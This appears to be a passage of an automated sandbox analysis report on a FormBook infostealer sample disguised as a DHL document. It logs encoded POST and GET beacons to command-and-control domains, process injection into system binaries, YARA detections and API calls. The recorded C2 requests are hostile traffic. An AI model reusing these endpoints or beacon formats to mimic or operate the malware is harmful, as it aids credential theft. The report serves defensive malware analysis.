Jan 7, 2025 12:25:30.379693985 CET	10906	OUT	POST /ricr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.uzshou.world Content-Length: 10305 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.uzshou.world Referer: http://www.uzshou.world/ricr/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 4f 75 68 70 2b 39 36 69 41 41 43 42 50 54 61 35 64 53 59 77 77 6f 75 75 66 51 70 33 61 75 72 47 79 66 79 45 32 36 51 62 39 37 76 51 51 30 4a 46 52 5a 6c 30 49 4c 62 50 30 65 56 6b 55 58 39 69 5a 46 4c 77 64 59 6a 34 65 54 68 4b 49 55 63 34 57 2f 39 63 44 58 43 71 49 61 74 56 55 62 2b 43 6e 59 4b 2b 45 52 77 4b 42 4b 47 38 48 78 6e 6a 32 30 30 38 37 47 42 47 41 4c 69 6f 54 48 36 4b 56 58 55 71 38 75 33 47 39 66 65 6e 66 58 6a 46 2f 72 65 66 30 2b 6b 4d 77 7a 56 68 69 41 51 41 48 48 35 6a 36 6d 72 71 55 70 4e 61 35 37 67 35 50 32 63 56 61 57 68 51 58 4a 4c 70 4a 44 58 6a 38 57 52 43 33 74 31 49 43 4f 70 38 74 47 6d 38 31 31 58 4b 4d 51 69 4f 51 55 48 58 66 45 65 4f 6c 77 59 62 47 37 77 59 76 38 55 52 56 42 63 34 30 64 66 54 46 42 36 61 36 44 58 4d 53 50 67 33 53 73 35 35 56 64 74 36 57 49 74 68 4e 32 47 62 61 2b 4d 39 66 44 46 4e 2f 39 44 69 42 56 74 6b 32 4f 74 75 4d 70 6b 61 51 47 78 67 54 30 76 2b 35 76 69 6e 47 73 31 64 4d 4b 38 70 6d 48 32 73 2f 38 4e 6f 52 44 42 39 4b [TRUNCATED] Data Ascii: Jz1hrtoh=Ouhp+96iAACBPTa5dSYwwouufQp3aurGyfyE26Qb97vQQ0JFRZl0ILbP0eVkUX9iZFLwdYj4eThKIUc4W/9cDXCqIatVUb+CnYK+ERwKBKG8Hxnj20087GBGALioTH6KVXUq8u3G9fenfXjF/ref0+kMwzVhiAQAHH5j6mrqUpNa57g5P2cVaWhQXJLpJDXj8WRC3t1ICOp8tGm811XKMQiOQUHXfEeOlwYbG7wYv8URVBc40dfTFB6a6DXMSPg3Ss55Vdt6WIthN2Gba+M9fDFN/9DiBVtk2OtuMpkaQGxgT0v+5vinGs1dMK8pmH2s/8NoRDB9KcyrGtrM2Zgj8+S9anmyrJ7e/RxYV5Y61zaBXIiIw7J3gA4IgonF8dT2TDjQeqYXdYbZw/tf/Hqeh/Qiva0Y+oRAI9aKJdQoU1rAExeo2CKrtZkNIRwqlwfNocKIbjPYdgEy81nWIqzzY1016VwXV9kSluzS2UQDwbmpttsGtTrIHB+/CBr37mK9d5OR/vyzh9ukfIZ8MNtZRvBk6G2KUar2cMd7M2icHr2TkBMdE3hfV53mj2/mgsVsex+1FZlza5e/p/fau5rIYObpXlqqqeLDFeI4GvvQZsSBzlp5ggHMO6uTGgCBxWVFv7AhyIKvXkkJ8Qis6yLO0s8rXfehwY8tOQnV0EgQ6zDqHg/opyQSsjYNXDvqbumT1vaikaXD22IQ/ndmwsRs4Hlreh2jUmtqUEfHLkzcyITKxGLerknkauIHG4i3a74/lkwxdDDqpoxAthPAJDN3BQ0QYuf7bEYJH3/EZsosRMFBJEhNnL4BpFL56cq9K8j1cjCQDQxFGX9ORcs+O7T/0kvmIbJDVU5r/QoBh5JPw/9xI7UzmQRqKvRSIC+D8zoc04IbOWv4fw5ey9Yo6lCmdrFq3rMVlNBr87t2L6XO1k4pet1bKneYse1FVb4+73zBJ8YAl3dtWDB+VCfwNUOPw0YSp4cYG4ZZMRWJqjsJfoD [TRUNCATED]
Jan 7, 2025 12:25:30.937256098 CET	1236	IN	HTTP/1.1 521 Date: Tue, 07 Jan 2025 11:25:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 6835 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zGhhKFfp1CBS0Deu2yQCyB%2Fgqn8kiNYlnyLGygXee3D5XkeVDlzKsT9PjR%2FSqn8r8xqLW4dugj2tWfLYiaDz415YtS2CfdQn%2Bgv1Bukw1fJc6wCcNmlCPgtmCMVGI2AAVUhl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8fe3966b5dd84265-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2074&min_rtt=2074&rtt_var=1037&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10906&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-U
Jan 7, 2025 12:25:30.937273979 CET	1236	IN	Data Raw: 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 75 7a 73 68 6f 75 2e 77 6f 72 6c 64 20 7c 20 35 32 31 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 64 6f 77 6e 3c 2f 74 Data Ascii: S"> ...<![endif]--><head><title>www.uzshou.world \| 521: Web server is down</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><met
Jan 7, 2025 12:25:30.937283993 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 Data Ascii: <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:b
Jan 7, 2025 12:25:30.937350988 CET	1236	IN	Data Raw: 72 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 69 63 6f 6e 2d 63 6c 6f 75 64 20 62 6c 6f 63 6b 20 6d 64 3a 68 69 64 64 65 6e 20 68 2d 32 30 20 62 67 2d 63 65 6e 74 65 72 20 62 67 2d 6e 6f 2d 72 65 70 65 61 74 22 3e 3c 2f Data Ascii: r"> <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block
Jan 7, 2025 12:25:30.937360048 CET	1236	IN	Data Raw: 61 79 2d 36 30 30 20 66 6f 6e 74 2d 6c 69 67 68 74 20 6c 65 61 64 69 6e 67 2d 31 2e 33 22 3e 0a 20 20 20 20 0a 20 20 20 20 48 6f 73 74 0a 20 20 20 20 0a 20 20 3c 2f 68 33 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 65 61 64 69 6e 67 2d Data Ascii: ay-600 font-light leading-1.3"> Host </h3> <span class="leading-1.3 text-2xl text-red-error">Error</span></div> </div> </div> </div> <div class="w-240 lg:w-full mx-auto mb-8 lg:p
Jan 7, 2025 12:25:30.937374115 CET	1236	IN	Data Raw: 35 32 31 22 3e 41 64 64 69 74 69 6f 6e 61 6c 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 Data Ascii: 521">Additional troubleshooting information</a>.</p> </div> </div> </div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid b
Jan 7, 2025 12:25:30.937382936 CET	361	IN	Data Raw: 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c Data Ascii: f-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50034	188.114.97.3	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:25:32.927809954 CET	542	OUT	GET /ricr/?Jz1hrtoh=DsJJ9LHvO2HIHRqZVScyyquLDFASZNq0lcbG2YQL94noaGFETLMOBonxxstsOEJaR2W2DKPzfgEtUmgcU+0uYV+kCJdhOpCyjrKYDUo1eaaYNgfh8khKz30=&UdJ=uBcLexhXPjVX9H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Host: www.uzshou.world Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Jan 7, 2025 12:25:33.504618883 CET	952	IN	HTTP/1.1 521 Date: Tue, 07 Jan 2025 11:25:33 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OfPYxcIaFUT6XlSi6%2FXkdJD%2FrHchFosJMe0tKPPQl58ek1D0S7RpA7qkwHaHQaM3jjnFGy%2FccwEFsr6dJ22Ggeujmvgogn1iStOgj4D12e8HiDjj1Oc6sLbSmJp5qO5yFiof"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8fe3967b5fd718cc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1494&rtt_var=747&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=542&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31 Data Ascii: error code: 521

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50035	47.83.1.90	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:25:38.558716059 CET	801	OUT	POST /mywm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.cruycq.info Content-Length: 205 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.cruycq.info Referer: http://www.cruycq.info/mywm/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 46 57 77 53 32 57 7a 64 39 71 4b 34 6d 55 67 70 54 58 42 76 69 39 56 78 69 45 4d 6c 4e 48 58 74 69 61 51 39 43 6f 68 63 68 59 67 35 33 56 74 4f 71 71 79 69 75 38 70 50 49 6a 6b 62 50 76 61 43 64 68 6e 71 4e 64 39 35 48 37 61 31 69 62 75 64 66 4d 6d 37 53 37 57 36 35 34 2f 64 63 37 44 7a 34 54 47 54 65 54 33 31 4b 33 37 4f 49 43 52 48 2f 63 63 36 46 6f 33 56 4d 54 48 6c 66 71 67 6f 73 4f 52 6a 59 48 4b 67 53 38 56 6f 41 2b 32 48 4d 71 67 54 75 46 52 49 38 70 62 73 63 37 77 51 50 47 44 41 36 4d 59 4b 52 5a 4b 39 4b 7a 51 4b 58 72 5a 35 72 51 44 6c 7a 39 2b 46 39 52 48 6c 41 51 3d 3d Data Ascii: Jz1hrtoh=FWwS2Wzd9qK4mUgpTXBvi9VxiEMlNHXtiaQ9CohchYg53VtOqqyiu8pPIjkbPvaCdhnqNd95H7a1ibudfMm7S7W654/dc7Dz4TGTeT31K37OICRH/cc6Fo3VMTHlfqgosORjYHKgS8VoA+2HMqgTuFRI8pbsc7wQPGDA6MYKRZK9KzQKXrZ5rQDlz9+F9RHlAQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50036	47.83.1.90	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:25:41.107777119 CET	821	OUT	POST /mywm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.cruycq.info Content-Length: 225 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.cruycq.info Referer: http://www.cruycq.info/mywm/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 46 57 77 53 32 57 7a 64 39 71 4b 34 6e 31 51 70 56 77 64 76 75 4e 56 79 6e 45 4d 6c 47 6e 58 70 69 61 63 39 43 74 5a 4d 69 71 45 35 33 31 64 4f 34 34 61 69 69 63 70 50 47 44 6b 65 53 66 61 4a 64 68 72 55 4e 59 64 35 48 37 65 31 69 65 53 64 63 37 4b 38 52 4c 58 63 68 49 2f 66 54 62 44 7a 34 54 47 54 65 54 53 6f 4b 33 6a 4f 49 78 35 48 2b 39 63 31 44 59 33 55 4c 54 48 6c 55 4b 68 68 73 4f 52 52 59 47 6d 47 53 2b 39 6f 41 38 2b 48 4d 37 67 51 30 56 52 4b 79 4a 61 79 4d 2b 5a 49 50 46 4b 31 7a 66 56 76 58 34 53 67 50 31 64 51 47 61 34 75 35 51 6e 57 75 36 33 78 77 53 36 73 62 59 30 4d 41 76 62 36 30 73 53 6b 36 65 72 67 45 6b 73 2b 44 7a 59 3d Data Ascii: Jz1hrtoh=FWwS2Wzd9qK4n1QpVwdvuNVynEMlGnXpiac9CtZMiqE531dO44aiicpPGDkeSfaJdhrUNYd5H7e1ieSdc7K8RLXchI/fTbDz4TGTeTSoK3jOIx5H+9c1DY3ULTHlUKhhsORRYGmGS+9oA8+HM7gQ0VRKyJayM+ZIPFK1zfVvX4SgP1dQGa4u5QnWu63xwS6sbY0MAvb60sSk6ergEks+DzY=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50037	47.83.1.90	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:25:43.651797056 CET	10903	OUT	POST /mywm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.cruycq.info Content-Length: 10305 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.cruycq.info Referer: http://www.cruycq.info/mywm/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 46 57 77 53 32 57 7a 64 39 71 4b 34 6e 31 51 70 56 77 64 76 75 4e 56 79 6e 45 4d 6c 47 6e 58 70 69 61 63 39 43 74 5a 4d 69 71 4d 35 33 6b 39 4f 71 4f 53 69 6a 63 70 50 59 54 6b 66 53 66 61 55 64 68 7a 51 4e 59 41 4d 48 2b 43 31 6b 4d 71 64 64 4f 2b 38 4b 62 58 63 6f 6f 2f 61 63 37 43 78 34 54 32 58 65 54 43 6f 4b 33 6a 4f 49 33 46 48 34 73 63 31 42 59 33 56 4d 54 48 35 66 71 68 4e 73 50 35 42 59 47 69 77 52 4f 64 6f 41 63 4f 48 50 4a 34 51 2f 56 52 45 78 4a 61 36 4d 2b 64 70 50 47 2f 4b 7a 63 49 45 58 34 32 67 43 42 34 6b 52 5a 49 7a 69 68 44 58 73 59 72 6f 35 68 43 55 62 62 6f 72 50 63 58 6b 30 75 4b 58 35 65 61 33 51 51 52 37 53 45 33 74 71 31 61 33 6c 31 4e 5a 6e 5a 41 5a 38 69 34 31 44 57 79 6d 52 31 42 62 66 52 35 34 55 47 36 39 39 74 58 5a 54 6e 74 6a 74 4e 6e 4a 30 49 69 35 37 76 62 54 67 72 5a 30 74 32 6a 59 4b 52 35 57 44 37 6d 39 77 74 49 45 69 52 72 65 50 51 6c 61 2b 42 44 49 65 37 43 38 50 4f 75 4f 4d 7a 42 39 51 49 54 75 78 74 6c 30 4e 67 2f 30 69 69 5a 6b 75 [TRUNCATED] Data Ascii: Jz1hrtoh=FWwS2Wzd9qK4n1QpVwdvuNVynEMlGnXpiac9CtZMiqM53k9OqOSijcpPYTkfSfaUdhzQNYAMH+C1kMqddO+8KbXcoo/ac7Cx4T2XeTCoK3jOI3FH4sc1BY3VMTH5fqhNsP5BYGiwROdoAcOHPJ4Q/VRExJa6M+dpPG/KzcIEX42gCB4kRZIzihDXsYro5hCUbborPcXk0uKX5ea3QQR7SE3tq1a3l1NZnZAZ8i41DWymR1BbfR54UG699tXZTntjtNnJ0Ii57vbTgrZ0t2jYKR5WD7m9wtIEiRrePQla+BDIe7C8POuOMzB9QITuxtl0Ng/0iiZku0kHqYGaUgkjyS4N0FLvlW9sluj0AqFILAqf9nN/adKDexlmqrxqR2nJRINWuxRT0NH9e5rlLAcDM4E/Ki9flZFYdV/L9I2sn+cMynQDymX/cW0jkD4tPAFPjva7H6ywrkM/nz1GkzBYeOD/A4ZiHTu7+tEGtDsESG0Ri/7hUAMvlJm6iWFsuNEC7/ltH6ZwdcEh1MITSs+sFFRDYLpQiNzR4TNpKI1Ocoi3jyFKZ9idiKNzs5ODYMPSnlQP4NYtNHjHfLv0NRAj0GklWaKGybnltdRM2sLRv+dV4kZnY7QAXZvfZ3OpaU1JSSpnV0iBY0jCUXsg0fgFEtkdapPeJzvTm+GE207kSSQazJ5Wu3qXfshyDBrVOlgdwQTsR3hxb8yZPQq151oE9CwLjAunecNBknNyz2VNMZbI8HmTBcKRnfnHL7ofqoAMWb/pd3+hmy/vX4wcd7FLFovdAr7LY02G4XLpzALGbMrlkouXKthVGj8XMEQs7eOyBUR74uE93lkD3fgHMyK9oYekmb/kDLL9eP5m/LWC5eX98TneH0nUzhWR+il7dHNHfDsuXRUnQn4g0mFrmbaAIYnaImV6c2AuAbl4oBCvvltZHmyVJcT0Su8R5QNh/tcJyVhLo9RQCi1zfMUZexAeyyUaXJ6GoOho0YKmnc6/6Ow [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50038	47.83.1.90	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:25:46.188036919 CET	541	OUT	GET /mywm/?Jz1hrtoh=IUYy1jDll+i8jXw9VA5MjpJVwSdABmjgj5hASYJF1IMJpVkU6oGvrctxMh0PV/CFKzqvEY5ZBre3he+5VeLrKbnInqLzH4Td90CNMEKkSDj9AjQVzK8xJbw=&UdJ=uBcLexhXPjVX9H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Host: www.cruycq.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Jan 7, 2025 12:25:47.802386045 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Tue, 07 Jan 2025 11:25:47 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Target ID:	0
Start time:	06:21:51
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe"
Imagebase:	0x1b0000
File size:	1'601'024 bytes
MD5 hash:	4210CBB8A0431DFCB5D8D945ACAC3E83
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:21:52
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe"
Imagebase:	0x8a0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1931217148.00000000029B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1930912470.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1931729344.0000000004750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:22:12
Start date:	07/01/2025
Path:	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe"
Imagebase:	0xb80000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4113347590.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	06:22:14
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\unlodctr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\unlodctr.exe"
Imagebase:	0x900000
File size:	34'304 bytes
MD5 hash:	EAF86537E26CC81C0767E58F66E01F52
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4113279367.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4113355046.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4111924093.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	06:22:27
Start date:	07/01/2025
Path:	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe"
Imagebase:	0xb80000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4115406780.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	06:22:39
Start date:	07/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	3.7%
Total number of Nodes:	1589
Total number of Limit Nodes:	38

Executed Functions

Function 001B42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 001B430D

Part of subcall function 001B6B57: _wcslen.LIBCMT ref: 001B6B6A

GetCurrentProcess.KERNEL32(?,0024CB64,00000000,?,?), ref: 001B4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 001B4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 001B4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001B4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 001B4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 001B447B
GetSystemInfo.KERNEL32(?,?,?), ref: 001B44A0

Strings

|O, xrefs: 001F36F8
